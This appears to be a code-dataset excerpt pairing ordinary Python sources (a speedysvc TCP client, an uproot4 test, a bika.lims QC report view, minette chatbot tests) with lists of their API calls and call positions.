conn_to_server.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
port = (
self.port
if self.port is not None
else self.server_methods.port
)
conn_to_server.connect((self.host, port))
conn_to_server.send(
self.compression_inst.typecode
)
def __del__(self):
self.conn_to_server.close()
@copydoc(ClientProviderBase.send)
def send(self, fn, data):
with self.lock:
return self._send(fn, data)
def _send(self, fn, data):
actually_compressed, data = \
self.compression_inst.compress(fn.serialiser.dumps(data))
cmd = fn.__name__.encode('ascii')
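        # Request header: compression flag, payload length and command name length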
prefix = len_packer.pack(int(actually_compressed), len(data), len(cmd))
displayed_reconnect_msg = False
while True:
# Try to keep reconnecting if
# connection no longer functioning
try:
self.conn_to_server.send(prefix + cmd + data)
def recv(amount):
                    # Note: string concatenation was slower in old Python
                    # versions, but on Python 3 it should be at least as fast
                    # as list concatenation for this use.
r = b''
while len(r) != amount:
add_me = self.conn_to_server.recv(amount)
if not add_me:
raise ConnectionResetError()
r += add_me
return r
actually_compressed, data_len, status = \
response_packer.unpack(recv(response_packer.size))
data = recv(data_len)
break
except (socket.error, ConnectionResetError):
if not displayed_reconnect_msg:
displayed_reconnect_msg = True
warnings.warn(
f"Client [pid {getpid()}]: "
f"TCP connection to service "
f"{self.server_methods.name} reset - "
f"the service may need to be checked/restarted!"
)
while True:
try:
import time
time.sleep(1)
self.__connect()
except (ConnectionRefusedError, ConnectionError):
continue
break
if actually_compressed:
data = self.compression_inst.decompress(data)
if status == b'+':
return fn.serialiser.loads(data)
else:
self._handle_exception(data)
raise Exception(data.decode('utf-8'))
if __name__ == '__main__':
inst = NetworkClient(5555)
t = time.time()
for x in range(500000):
i = b"my vfdsfdsfsdfsdfsdfdsfsdaluetasdsadasdsadsadsaest"# bytes([randint(0, 255)])*500
#print('SEND:', i)
assert inst.send('echo', i) == i
print(time.time()-t)
|
[
"os.getpid",
"socket.socket",
"speedysvc.client_server.base_classes.ClientProviderBase.ClientProviderBase.__init__",
"_thread.allocate_lock",
"time.time",
"time.sleep",
"speedysvc.toolkit.documentation.copydoc.copydoc"
] |
[((1643, 1675), 'speedysvc.toolkit.documentation.copydoc.copydoc', 'copydoc', (['ClientProviderBase.send'], {}), '(ClientProviderBase.send)\n', (1650, 1675), False, 'from speedysvc.toolkit.documentation.copydoc import copydoc\n'), ((4075, 4086), 'time.time', 'time.time', ([], {}), '()\n', (4084, 4086), False, 'import time\n'), ((739, 754), '_thread.allocate_lock', 'allocate_lock', ([], {}), '()\n', (752, 754), False, 'from _thread import allocate_lock\n'), ((763, 812), 'speedysvc.client_server.base_classes.ClientProviderBase.ClientProviderBase.__init__', 'ClientProviderBase.__init__', (['self', 'server_methods'], {}), '(self, server_methods)\n', (790, 812), False, 'from speedysvc.client_server.base_classes.ClientProviderBase import ClientProviderBase\n'), ((960, 1009), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (973, 1009), False, 'import socket\n'), ((4290, 4301), 'time.time', 'time.time', ([], {}), '()\n', (4299, 4301), False, 'import time\n'), ((3554, 3567), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (3564, 3567), False, 'import time\n'), ((3214, 3222), 'os.getpid', 'getpid', ([], {}), '()\n', (3220, 3222), False, 'from os import getpid\n')]
|
# BSD 3-Clause License; see https://github.com/scikit-hep/uproot4/blob/master/LICENSE
from __future__ import absolute_import
import pytest
import skhep_testdata
import uproot4
def test_version():
assert uproot4.classname_decode(
uproot4.classname_encode("xAOD::MissingETAuxAssociationMap_v2")
) == ("xAOD::MissingETAuxAssociationMap_v2", None)
assert uproot4.classname_decode(
uproot4.classname_encode("xAOD::MissingETAuxAssociationMap_v2", 9)
) == ("xAOD::MissingETAuxAssociationMap_v2", 9)
|
[
"uproot4.classname_encode"
] |
[((246, 309), 'uproot4.classname_encode', 'uproot4.classname_encode', (['"""xAOD::MissingETAuxAssociationMap_v2"""'], {}), "('xAOD::MissingETAuxAssociationMap_v2')\n", (270, 309), False, 'import uproot4\n'), ((410, 476), 'uproot4.classname_encode', 'uproot4.classname_encode', (['"""xAOD::MissingETAuxAssociationMap_v2"""', '(9)'], {}), "('xAOD::MissingETAuxAssociationMap_v2', 9)\n", (434, 476), False, 'import uproot4\n')]
|
import json
import tempfile
from AccessControl import getSecurityManager
from DateTime import DateTime
from Products.CMFCore.utils import getToolByName
from Products.Five.browser.pagetemplatefile import ViewPageTemplateFile
from bika.lims import bikaMessageFactory as _
from bika.lims.utils import t, isAttributeHidden
from bika.lims.browser import BrowserView
from bika.lims.browser.reports.selection_macros import SelectionMacrosView
from gpw import plot
from bika.lims.utils import to_utf8
from plone.app.content.browser.interfaces import IFolderContentsView
from plone.app.layout.globals.interfaces import IViewView
from zope.interface import implements
import os
import plone
class Report(BrowserView):
implements(IViewView)
template = ViewPageTemplateFile(
"templates/qualitycontrol_referenceanalysisqc.pt")
# if unsuccessful we return here:
default_template = ViewPageTemplateFile("templates/qualitycontrol.pt")
def __init__(self, context, request, report=None):
super(Report, self).__init__(context, request)
self.report = report
self.selection_macros = SelectionMacrosView(self.context, self.request)
def __call__(self):
header = _("Reference analysis QC")
subheader = _("Reference analysis quality control graphs ")
MinimumResults = self.context.bika_setup.getMinimumResults()
warning_icon = "<img src='" + self.portal_url + "/++resource++bika.lims.images/warning.png' height='9' width='9'/>"
error_icon = "<img src='" + self.portal_url + "/++resource++bika.lims.images/exclamation.png' height='9' width='9'/>"
self.parms = []
titles = []
sample_uid = self.request.form.get('ReferenceSampleUID', '')
sample = self.reference_catalog.lookupObject(sample_uid)
if not sample:
message = _("No reference sample was selected.")
self.context.plone_utils.addPortalMessage(message, 'error')
return self.default_template()
self.parms.append(
{'title': _("Reference Sample"), 'value': sample.Title()})
titles.append(sample.Title())
service_uid = self.request.form.get('ReferenceServiceUID', '')
service = self.reference_catalog.lookupObject(service_uid)
if not service:
message = _("No analysis services were selected.")
self.context.plone_utils.addPortalMessage(message, 'error')
return self.default_template()
self.contentFilter = {'portal_type': 'ReferenceAnalysis',
'review_state': ['verified', 'published'],
'path': {
"query": "/".join(sample.getPhysicalPath()),
"level": 0}}
self.parms.append(
{'title': _("Analysis Service"), 'value': service.Title()})
titles.append(service.Title())
val = self.selection_macros.parse_daterange(self.request,
'getDateVerified',
'DateVerified')
if val:
self.contentFilter[val['contentFilter'][0]] = val['contentFilter'][1]
self.parms.append(val['parms'])
titles.append(val['titles'])
proxies = self.bika_analysis_catalog(self.contentFilter)
if not proxies:
message = _("No analyses matched your query")
self.context.plone_utils.addPortalMessage(message, 'error')
return self.default_template()
# Compile a list with all relevant analysis data
analyses = []
out_of_range_count = 0
results = []
capture_dates = []
plotdata = ""
tabledata = []
for analysis in proxies:
analysis = analysis.getObject()
service = analysis.getService()
resultsrange = \
[x for x in sample.getReferenceResults() if x['uid'] == service_uid][
0]
try:
result = float(analysis.getResult())
results.append(result)
except:
result = analysis.getResult()
capture_dates.append(analysis.getResultCaptureDate())
if result < float(resultsrange['min']) or result > float(
resultsrange['max']):
out_of_range_count += 1
try:
precision = str(analysis.getPrecision())
except:
precision = "2"
try:
formatted_result = str("%." + precision + "f") % result
except:
formatted_result = result
tabledata.append({_("Analysis"): analysis.getId(),
_("Result"): formatted_result,
_("Analyst"): analysis.getAnalyst(),
_(
"Captured"): analysis.getResultCaptureDate().strftime(
self.date_format_long)})
plotdata += "%s\t%s\t%s\t%s\n" % (
analysis.getResultCaptureDate().strftime(self.date_format_long),
result,
resultsrange['min'],
resultsrange['max']
)
plotdata.encode('utf-8')
result_values = [int(r) for r in results]
result_dates = [c for c in capture_dates]
self.parms += [
{"title": _("Total analyses"), "value": len(proxies)},
]
# # This variable is output to the TAL
self.report_data = {
'header': header,
'subheader': subheader,
'parms': self.parms,
'tables': [],
'footnotes': [],
}
if MinimumResults <= len(proxies):
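            # Only build the plot when at least MinimumResults analyses are available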
plotscript = """
set terminal png transparent truecolor enhanced size 700,350 font "Verdana, 8"
set title "%(title)s"
set xlabel "%(xlabel)s"
set ylabel "%(ylabel)s"
set key off
#set logscale
set timefmt "%(timefmt)s"
set xdata time
set format x "%(xformat)s"
set xrange ["%(x_start)s":"%(x_end)s"]
set auto fix
set offsets graph 0, 0, 1, 1
set xtics border nomirror rotate by 90 font "Verdana, 5" offset 0,-3
set ytics nomirror
f(x) = mean_y
fit f(x) 'gpw_DATAFILE_gpw' u 1:3 via mean_y
stddev_y = sqrt(FIT_WSSR / (FIT_NDF + 1))
plot mean_y-stddev_y with filledcurves y1=mean_y lt 1 lc rgb "#efefef",\
mean_y+stddev_y with filledcurves y1=mean_y lt 1 lc rgb "#efefef",\
mean_y with lines lc rgb '#ffffff' lw 3,\
"gpw_DATAFILE_gpw" using 1:3 title 'data' with points pt 7 ps 1 lc rgb '#0000ee' lw 2,\
'' using 1:3 smooth unique lc rgb '#aaaaaa' lw 2,\
'' using 1:4 with lines lc rgb '#000000' lw 1,\
'' using 1:5 with lines lc rgb '#000000' lw 1""" % \
{
'title': "",
'xlabel': "",
'ylabel': service.getUnit(),
'x_start': "%s" % min(result_dates).strftime(
self.date_format_short),
'x_end': "%s" % max(result_dates).strftime(
self.date_format_short),
'timefmt': r'%Y-%m-%d %H:%M',
'xformat': '%%Y-%%m-%%d\n%%H:%%M',
}
plot_png = plot(str(plotdata), plotscript=str(plotscript),
usefifo=False)
# Temporary PNG data file
fh, data_fn = tempfile.mkstemp(suffix='.png')
os.write(fh, plot_png)
plot_url = data_fn
self.request['to_remove'].append(data_fn)
plot_url = data_fn
else:
plot_url = ""
table = {
'title': "%s: %s (%s)" % (
t(_("Analysis Service")),
service.Title(),
service.getKeyword()
),
'columns': [_('Analysis'),
_('Result'),
_('Analyst'),
_('Captured')],
'parms': [],
'data': tabledata,
'plot_url': plot_url,
}
self.report_data['tables'].append(table)
translate = self.context.translate
## footnotes
if out_of_range_count:
msgid = _("Analyses out of range")
self.report_data['footnotes'].append(
"%s %s" % (error_icon, t(msgid)))
self.report_data['parms'].append(
{"title": _("Analyses out of range"),
"value": out_of_range_count})
title = t(header)
if titles:
title += " (%s)" % " ".join(titles)
return {
'report_title': title,
'report_data': self.template(),
}
def isSamplePointHidden(self):
return isAttributeHidden('AnalysisRequest', 'SamplePoint')
|
[
"bika.lims.utils.isAttributeHidden",
"bika.lims.bikaMessageFactory",
"bika.lims.browser.reports.selection_macros.SelectionMacrosView",
"bika.lims.utils.t",
"zope.interface.implements",
"tempfile.mkstemp",
"Products.Five.browser.pagetemplatefile.ViewPageTemplateFile",
"os.write"
] |
[((715, 736), 'zope.interface.implements', 'implements', (['IViewView'], {}), '(IViewView)\n', (725, 736), False, 'from zope.interface import implements\n'), ((753, 824), 'Products.Five.browser.pagetemplatefile.ViewPageTemplateFile', 'ViewPageTemplateFile', (['"""templates/qualitycontrol_referenceanalysisqc.pt"""'], {}), "('templates/qualitycontrol_referenceanalysisqc.pt')\n", (773, 824), False, 'from Products.Five.browser.pagetemplatefile import ViewPageTemplateFile\n'), ((895, 946), 'Products.Five.browser.pagetemplatefile.ViewPageTemplateFile', 'ViewPageTemplateFile', (['"""templates/qualitycontrol.pt"""'], {}), "('templates/qualitycontrol.pt')\n", (915, 946), False, 'from Products.Five.browser.pagetemplatefile import ViewPageTemplateFile\n'), ((1119, 1166), 'bika.lims.browser.reports.selection_macros.SelectionMacrosView', 'SelectionMacrosView', (['self.context', 'self.request'], {}), '(self.context, self.request)\n', (1138, 1166), False, 'from bika.lims.browser.reports.selection_macros import SelectionMacrosView\n'), ((1210, 1236), 'bika.lims.bikaMessageFactory', '_', (['"""Reference analysis QC"""'], {}), "('Reference analysis QC')\n", (1211, 1236), True, 'from bika.lims import bikaMessageFactory as _\n'), ((1257, 1304), 'bika.lims.bikaMessageFactory', '_', (['"""Reference analysis quality control graphs """'], {}), "('Reference analysis quality control graphs ')\n", (1258, 1304), True, 'from bika.lims import bikaMessageFactory as _\n'), ((9001, 9010), 'bika.lims.utils.t', 't', (['header'], {}), '(header)\n', (9002, 9010), False, 'from bika.lims.utils import t, isAttributeHidden\n'), ((9235, 9286), 'bika.lims.utils.isAttributeHidden', 'isAttributeHidden', (['"""AnalysisRequest"""', '"""SamplePoint"""'], {}), "('AnalysisRequest', 'SamplePoint')\n", (9252, 9286), False, 'from bika.lims.utils import t, isAttributeHidden\n'), ((1851, 1889), 'bika.lims.bikaMessageFactory', '_', (['"""No reference sample was selected."""'], {}), "('No reference sample was selected.')\n", (1852, 1889), True, 'from bika.lims import bikaMessageFactory as _\n'), ((2327, 2367), 'bika.lims.bikaMessageFactory', '_', (['"""No analysis services were selected."""'], {}), "('No analysis services were selected.')\n", (2328, 2367), True, 'from bika.lims import bikaMessageFactory as _\n'), ((3421, 3456), 'bika.lims.bikaMessageFactory', '_', (['"""No analyses matched your query"""'], {}), "('No analyses matched your query')\n", (3422, 3456), True, 'from bika.lims import bikaMessageFactory as _\n'), ((7892, 7923), 'tempfile.mkstemp', 'tempfile.mkstemp', ([], {'suffix': '""".png"""'}), "(suffix='.png')\n", (7908, 7923), False, 'import tempfile\n'), ((7936, 7958), 'os.write', 'os.write', (['fh', 'plot_png'], {}), '(fh, plot_png)\n', (7944, 7958), False, 'import os\n'), ((8721, 8747), 'bika.lims.bikaMessageFactory', '_', (['"""Analyses out of range"""'], {}), "('Analyses out of range')\n", (8722, 8747), True, 'from bika.lims import bikaMessageFactory as _\n'), ((2055, 2076), 'bika.lims.bikaMessageFactory', '_', (['"""Reference Sample"""'], {}), "('Reference Sample')\n", (2056, 2076), True, 'from bika.lims import bikaMessageFactory as _\n'), ((2831, 2852), 'bika.lims.bikaMessageFactory', '_', (['"""Analysis Service"""'], {}), "('Analysis Service')\n", (2832, 2852), True, 'from bika.lims import bikaMessageFactory as _\n'), ((5497, 5516), 'bika.lims.bikaMessageFactory', '_', (['"""Total analyses"""'], {}), "('Total analyses')\n", (5498, 5516), True, 'from bika.lims import bikaMessageFactory as _\n'), ((8324, 8337), 
'bika.lims.bikaMessageFactory', '_', (['"""Analysis"""'], {}), "('Analysis')\n", (8325, 8337), True, 'from bika.lims import bikaMessageFactory as _\n'), ((8363, 8374), 'bika.lims.bikaMessageFactory', '_', (['"""Result"""'], {}), "('Result')\n", (8364, 8374), True, 'from bika.lims import bikaMessageFactory as _\n'), ((8400, 8412), 'bika.lims.bikaMessageFactory', '_', (['"""Analyst"""'], {}), "('Analyst')\n", (8401, 8412), True, 'from bika.lims import bikaMessageFactory as _\n'), ((8438, 8451), 'bika.lims.bikaMessageFactory', '_', (['"""Captured"""'], {}), "('Captured')\n", (8439, 8451), True, 'from bika.lims import bikaMessageFactory as _\n'), ((8913, 8939), 'bika.lims.bikaMessageFactory', '_', (['"""Analyses out of range"""'], {}), "('Analyses out of range')\n", (8914, 8939), True, 'from bika.lims import bikaMessageFactory as _\n'), ((4734, 4747), 'bika.lims.bikaMessageFactory', '_', (['"""Analysis"""'], {}), "('Analysis')\n", (4735, 4747), True, 'from bika.lims import bikaMessageFactory as _\n'), ((4797, 4808), 'bika.lims.bikaMessageFactory', '_', (['"""Result"""'], {}), "('Result')\n", (4798, 4808), True, 'from bika.lims import bikaMessageFactory as _\n'), ((4858, 4870), 'bika.lims.bikaMessageFactory', '_', (['"""Analyst"""'], {}), "('Analyst')\n", (4859, 4870), True, 'from bika.lims import bikaMessageFactory as _\n'), ((4925, 4938), 'bika.lims.bikaMessageFactory', '_', (['"""Captured"""'], {}), "('Captured')\n", (4926, 4938), True, 'from bika.lims import bikaMessageFactory as _\n'), ((8191, 8212), 'bika.lims.bikaMessageFactory', '_', (['"""Analysis Service"""'], {}), "('Analysis Service')\n", (8192, 8212), True, 'from bika.lims import bikaMessageFactory as _\n'), ((8837, 8845), 'bika.lims.utils.t', 't', (['msgid'], {}), '(msgid)\n', (8838, 8845), False, 'from bika.lims.utils import t, isAttributeHidden\n')]
|
import sys
import os
sys.path.append(os.pardir)
import pytest
from pytz import timezone
from logging import Logger, FileHandler, getLogger
from datetime import datetime
from types import GeneratorType
from minette import (
Minette, DialogService, SQLiteConnectionProvider,
SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore,
Tagger, Config, DialogRouter, StoreSet, Message, User, Group,
DependencyContainer, Payload
)
from minette.utils import date_to_unixtime
from minette.tagger.janometagger import JanomeTagger
now = datetime.now()
user_id = "user_id" + str(date_to_unixtime(now))
print("user_id: {}".format(user_id))
class CustomTagger(Tagger):
pass
class CustomConnectionProvider(SQLiteConnectionProvider):
pass
class CustomContextStore(SQLiteContextStore):
pass
class CustomUserStore(SQLiteUserStore):
pass
class CustomMessageLogStore(SQLiteMessageLogStore):
pass
class CustomDataStores(StoreSet):
connection_provider = CustomConnectionProvider
context_store = CustomContextStore
user_store = CustomUserStore
messagelog_store = CustomMessageLogStore
class MyDialog(DialogService):
def compose_response(self, request, context, connection):
return "res:" + request.text
class ErrorDialog(DialogService):
def compose_response(self, request, context, connection):
1 / 0
return "res:" + request.text
class MyDialogRouter(DialogRouter):
def __init__(self, custom_router_arg=None, **kwargs):
super().__init__(**kwargs)
self.custom_attr = custom_router_arg
class TaggerDialog(DialogService):
def compose_response(self, request, context, connection):
return request.to_reply(
text=request.text,
payloads=[Payload(content_type="data", content=request.words)])
class TaggerManuallyParseDialog(DialogService):
def compose_response(self, request, context, connection):
assert request.words == []
request.words = self.dependencies.tagger.parse(request.text, max_length=10)
return request.to_reply(
text=request.text,
payloads=[Payload(content_type="data", content=request.words)])
class TaggerManuallyParseGeneratorDialog(DialogService):
def compose_response(self, request, context, connection):
assert request.words == []
request.words = self.dependencies.tagger.parse_as_generator(request.text, max_length=10)
return request.to_reply(
text=request.text,
payloads=[Payload(content_type="data", content=request.words)])
def test_init():
# without config
bot = Minette()
assert bot.config.get("timezone") == "UTC"
assert bot.timezone == timezone("UTC")
assert isinstance(bot.logger, Logger)
assert bot.logger.name == "minette"
assert isinstance(bot.connection_provider, SQLiteConnectionProvider)
assert isinstance(bot.context_store, SQLiteContextStore)
assert isinstance(bot.user_store, SQLiteUserStore)
assert isinstance(bot.messagelog_store, SQLiteMessageLogStore)
assert bot.default_dialog_service is None
assert isinstance(bot.tagger, Tagger)
def test_init_config():
bot = Minette(config_file="./config/test_config.ini")
assert bot.timezone == timezone("Asia/Tokyo")
for handler in bot.logger.handlers:
if isinstance(handler, FileHandler):
assert handler.baseFilename == \
os.path.join(os.path.dirname(os.path.abspath(__file__)),
bot.config.get("log_file"))
assert bot.connection_provider.connection_str != ""
assert bot.connection_provider.connection_str == \
bot.config.get("connection_str")
assert bot.context_store.timeout == bot.config.get("context_timeout")
assert bot.context_store.table_name == bot.config.get("context_table")
assert bot.user_store.table_name == bot.config.get("user_table")
assert bot.messagelog_store.table_name == \
bot.config.get("messagelog_table")
def test_init_args():
# initialize arguments
config = Config("")
config.confg_parser.add_section("test_section")
config.confg_parser.set("test_section", "test_key", "test_value")
tz = timezone("Asia/Tokyo")
logger = getLogger("test_core_logger")
print(logger.name)
connection_provider = CustomConnectionProvider
context_store = CustomContextStore
user_store = CustomUserStore
messagelog_store = CustomMessageLogStore
data_stores = CustomDataStores
default_dialog_service = MyDialog
dialog_router = MyDialogRouter
tagger = CustomTagger
custom_router_arg = "router_value"
# create bot
bot = Minette(
config=config, timezone=tz, logger=logger,
connection_provider=connection_provider, context_store=context_store,
user_store=user_store, messagelog_store=messagelog_store,
default_dialog_service=default_dialog_service,
dialog_router=dialog_router,
custom_router_arg=custom_router_arg,
tagger=tagger, prepare_table=True
)
assert bot.config.get("test_key", section="test_section") == "test_value"
assert bot.timezone == timezone("Asia/Tokyo")
assert bot.logger.name == "test_core_logger"
assert isinstance(bot.connection_provider, CustomConnectionProvider)
assert isinstance(bot.context_store, CustomContextStore)
assert isinstance(bot.user_store, CustomUserStore)
assert isinstance(bot.messagelog_store, CustomMessageLogStore)
assert bot.default_dialog_service is MyDialog
assert isinstance(bot.dialog_router, MyDialogRouter)
assert bot.dialog_router.custom_attr == "router_value"
assert isinstance(bot.tagger, CustomTagger)
# create bot with data_stores
bot = Minette(
config=config, timezone=tz, logger=logger,
data_stores=data_stores,
default_dialog_service=default_dialog_service,
dialog_router=dialog_router,
custom_router_arg=custom_router_arg,
tagger=tagger, prepare_table=True
)
assert bot.config.get("test_key", section="test_section") == "test_value"
assert bot.timezone == timezone("Asia/Tokyo")
assert bot.logger.name == "test_core_logger"
assert isinstance(bot.connection_provider, CustomConnectionProvider)
assert isinstance(bot.context_store, CustomContextStore)
assert isinstance(bot.user_store, CustomUserStore)
assert isinstance(bot.messagelog_store, CustomMessageLogStore)
assert bot.default_dialog_service is MyDialog
assert isinstance(bot.dialog_router, MyDialogRouter)
assert bot.dialog_router.custom_attr == "router_value"
assert isinstance(bot.tagger, CustomTagger)
def test_get_user():
bot = Minette(prepare_table=True)
with bot.connection_provider.get_connection() as connection:
# register user for test
u = bot.user_store.get(
channel="get_user_test", channel_user_id=user_id,
connection=connection)
u.name = "user channel"
bot.user_store.save(u, connection)
u_detail = bot.user_store.get(
channel="get_user_test_detail", channel_user_id=user_id,
connection=connection)
u_detail.name = "user detail"
bot.user_store.save(u_detail, connection)
# without detail
request = Message(
text="hello", channel="get_user_test", channel_user_id=user_id)
user = bot._get_user(request, connection)
assert user.channel == "get_user_test"
assert user.channel_user_id == user_id
assert user.name == "user channel"
# with detail
bot.config.confg_parser.set("minette", "user_scope", "channel_detail")
request = Message(
text="hello", channel="get_user_test", channel_detail="detail",
channel_user_id=user_id)
user = bot._get_user(request, connection)
assert user.channel == "get_user_test_detail"
assert user.channel_user_id == user_id
assert user.name == "user detail"
def test_save_user():
bot = Minette(prepare_table=True)
with bot.connection_provider.get_connection() as connection:
# register user for test
u = bot.user_store.get(
channel="save_user_test", channel_user_id=user_id,
connection=connection)
u.name = "<NAME>"
# save
bot._save_user(u, connection)
# check
request = Message(
text="hello", channel="save_user_test", channel_user_id=user_id)
user = bot._get_user(request, connection)
assert user.channel == "save_user_test"
assert user.channel_user_id == user_id
assert user.name == "<NAME>"
def test_get_context():
bot = Minette(prepare_table=True)
with bot.connection_provider.get_connection() as connection:
# register context for test
ctx = bot.context_store.get(
channel="get_context_test", channel_user_id=user_id,
connection=connection)
ctx.data["unixtime"] = date_to_unixtime(now)
bot.context_store.save(ctx, connection)
ctx_group = bot.context_store.get(
channel="get_context_test", channel_user_id="group_" + user_id,
connection=connection)
ctx_group.data["unixtime"] = date_to_unixtime(now)
bot.context_store.save(ctx_group, connection)
ctx_detail = bot.context_store.get(
channel="get_context_test_detail", channel_user_id=user_id,
connection=connection)
ctx_detail.data["unixtime"] = date_to_unixtime(now)
bot.context_store.save(ctx_detail, connection)
# without detail
request = Message(
text="hello", channel="get_context_test", channel_user_id=user_id)
context = bot._get_context(request, connection)
assert context.channel == "get_context_test"
assert context.channel_user_id == user_id
assert context.data["unixtime"] == date_to_unixtime(now)
# group without group
request = Message(
text="hello", channel="get_context_test", channel_user_id=user_id)
request.group = Group(id="group_" + user_id)
context = bot._get_context(request, connection)
assert context.channel == "get_context_test"
assert context.channel_user_id == "group_" + user_id
assert context.data["unixtime"] == date_to_unixtime(now)
# with detail
bot.config.confg_parser.set(
"minette", "context_scope", "channel_detail")
request = Message(
text="hello", channel="get_context_test", channel_detail="detail",
channel_user_id=user_id)
context = bot._get_context(request, connection)
assert context.channel == "get_context_test_detail"
assert context.channel_user_id == user_id
assert context.data["unixtime"] == date_to_unixtime(now)
def test_save_context():
bot = Minette(prepare_table=True)
with bot.connection_provider.get_connection() as connection:
# register context for test
ctx = bot.context_store.get(
channel="save_context_test", channel_user_id=user_id,
connection=connection)
ctx.data["unixtime"] = date_to_unixtime(now)
# save
ctx.topic.keep_on = True
bot._save_context(ctx, connection)
# check
request = Message(
text="hello", channel="save_context_test", channel_user_id=user_id)
context = bot._get_context(request, connection)
assert context.channel == "save_context_test"
assert context.channel_user_id == user_id
assert context.data["unixtime"] == date_to_unixtime(now)
def test_chat():
bot = Minette(default_dialog_service=MyDialog)
res = bot.chat("hello")
assert res.messages[0].text == "res:hello"
def test_chat_error():
bot = Minette(default_dialog_service=MyDialog)
bot.connection_provider = None
res = bot.chat("hello")
assert res.messages == []
def test_chat_messagelog_error():
bot = Minette(default_dialog_service=MyDialog)
bot.messagelog_store = None
res = bot.chat("hello")
assert res.messages[0].text == "res:hello"
def test_chat_dialog_error():
bot = Minette(default_dialog_service=ErrorDialog)
res = bot.chat("hello")
assert res.messages[0].text == "?"
def test_chat_timezone():
bot = Minette(default_dialog_service=MyDialog, timezone=timezone("Asia/Tokyo"))
res = bot.chat("hello")
# bot.timezone itself is +9:19
assert res.messages[0].timestamp.tzinfo == datetime.now(tz=bot.timezone).tzinfo
def test_chat_with_tagger():
bot = Minette(
default_dialog_service=TaggerDialog,
tagger=JanomeTagger)
res = bot.chat("今日はいい天気です。")
assert res.messages[0].text == "今日はいい天気です。"
words = res.messages[0].payloads[0].content
assert words[0].surface == "今日"
assert words[1].surface == "は"
assert words[2].surface == "いい"
assert words[3].surface == "天気"
assert words[4].surface == "です"
def test_chat_with_tagger_no_parse():
bot = Minette(
default_dialog_service=TaggerDialog,
tagger=JanomeTagger, tagger_max_length=0)
assert bot.tagger.max_length == 0
res = bot.chat("今日はいい天気です。")
assert res.messages[0].text == "今日はいい天気です。"
words = res.messages[0].payloads[0].content
assert words == []
def test_chat_parse_morph_manually():
bot = Minette(
default_dialog_service=TaggerManuallyParseDialog,
tagger=JanomeTagger, tagger_max_length=0)
bot.dialog_uses(tagger=bot.tagger)
res = bot.chat("今日はいい天気です。")
assert res.messages[0].text == "今日はいい天気です。"
words = res.messages[0].payloads[0].content
assert words[0].surface == "今日"
assert words[1].surface == "は"
assert words[2].surface == "いい"
assert words[3].surface == "天気"
assert words[4].surface == "です"
def test_chat_parse_morph_manually_generator():
bot = Minette(
default_dialog_service=TaggerManuallyParseGeneratorDialog,
tagger=JanomeTagger, tagger_max_length=0)
bot.dialog_uses(tagger=bot.tagger)
res = bot.chat("今日はいい天気です。")
assert res.messages[0].text == "今日はいい天気です。"
assert isinstance(res.messages[0].payloads[0].content, GeneratorType)
words = [w for w in res.messages[0].payloads[0].content]
assert words[0].surface == "今日"
assert words[1].surface == "は"
assert words[2].surface == "いい"
assert words[3].surface == "天気"
assert words[4].surface == "です"
def test_dialog_uses():
class HighCostToCreate:
pass
class OnlyForFooDS:
pass
class FooFialog(DialogService):
pass
# run once when create bot
hctc = HighCostToCreate()
offds = OnlyForFooDS()
# create bot
bot = Minette()
# set dependencies to dialogs
bot.dialog_uses(
{
FooFialog: {"api": offds}
},
highcost=hctc
)
assert bot.dialog_router.dependencies.highcost == hctc
assert hasattr(bot.dialog_router.dependencies, "api") is False
assert bot.dialog_router.dependency_rules[FooFialog]["api"] == offds
# create bot and not set dialog dependencies
bot_no_dd = Minette()
assert bot_no_dd.dialog_router.dependencies is None
bot_no_dd.dialog_uses()
assert isinstance(bot_no_dd.dialog_router.dependencies, DependencyContainer)
|
[
"sys.path.append",
"minette.Payload",
"os.path.abspath",
"minette.Group",
"logging.getLogger",
"minette.Config",
"minette.utils.date_to_unixtime",
"minette.Message",
"pytz.timezone",
"datetime.datetime.now",
"minette.Minette"
] |
[((21, 47), 'sys.path.append', 'sys.path.append', (['os.pardir'], {}), '(os.pardir)\n', (36, 47), False, 'import sys\n'), ((546, 560), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (558, 560), False, 'from datetime import datetime\n'), ((2640, 2649), 'minette.Minette', 'Minette', ([], {}), '()\n', (2647, 2649), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((3202, 3249), 'minette.Minette', 'Minette', ([], {'config_file': '"""./config/test_config.ini"""'}), "(config_file='./config/test_config.ini')\n", (3209, 3249), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((4072, 4082), 'minette.Config', 'Config', (['""""""'], {}), "('')\n", (4078, 4082), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((4214, 4236), 'pytz.timezone', 'timezone', (['"""Asia/Tokyo"""'], {}), "('Asia/Tokyo')\n", (4222, 4236), False, 'from pytz import timezone\n'), ((4250, 4279), 'logging.getLogger', 'getLogger', (['"""test_core_logger"""'], {}), "('test_core_logger')\n", (4259, 4279), False, 'from logging import Logger, FileHandler, getLogger\n'), ((4672, 5017), 'minette.Minette', 'Minette', ([], {'config': 'config', 'timezone': 'tz', 'logger': 'logger', 'connection_provider': 'connection_provider', 'context_store': 'context_store', 'user_store': 'user_store', 'messagelog_store': 'messagelog_store', 'default_dialog_service': 'default_dialog_service', 'dialog_router': 'dialog_router', 'custom_router_arg': 'custom_router_arg', 'tagger': 'tagger', 'prepare_table': '(True)'}), '(config=config, timezone=tz, logger=logger, connection_provider=\n connection_provider, context_store=context_store, user_store=user_store,\n messagelog_store=messagelog_store, default_dialog_service=\n default_dialog_service, dialog_router=dialog_router, custom_router_arg=\n custom_router_arg, tagger=tagger, prepare_table=True)\n', (4679, 5017), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((5753, 5989), 'minette.Minette', 